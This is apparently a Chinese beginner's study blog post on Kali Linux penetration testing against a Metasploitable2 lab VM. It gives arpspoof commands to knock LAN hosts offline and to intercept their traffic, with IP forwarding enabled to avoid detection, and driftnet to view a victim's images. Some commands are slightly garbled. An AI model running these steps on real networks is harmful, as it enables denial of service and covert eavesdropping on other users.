kali linux渗透入门(1)

对渗透感兴趣,这些天研究了一下kali,搞了个课程,在VM上搭建了个靶机:

https://sourceforge.mirrorservice.org/m/me/metasploitable/Metasploitable2/ 

对于kali的安装不做过多陈述,网上很多教程,以下把我学习到的笔记记录,更新中。

1 sqlmap sql注入 ,没啥好说,id=1测试,注入,基本行不通

2.arps 欺骗攻击,使得内网主机断网

(1)先查看网卡是多少: ifconfig

(2) arps攻击:

--arpspoof -i eth0  -t XXX(目标IP) -r XXX(网关) 可以使断网

3. arpspoof 截取内网其他用户的流量

(1)先开启内网转发,不让目标容易察觉出问题:

cat /proc/sys/net/ipv4/ip

echo 1 >/proc/sys/net/ipv4/ip_forward

(2)然后攻击,先将目标流量转移网关

--arpspoof -i eth0  -t XXX(目标IP) XXX(网关)    

--arpspoof -i eth0 -t XXX(网关) XXX (自身IP)

(3)截取目标主机的流量,例如查看他再看的图片

driftnet -i eth0

 

你可能感兴趣的:(linux)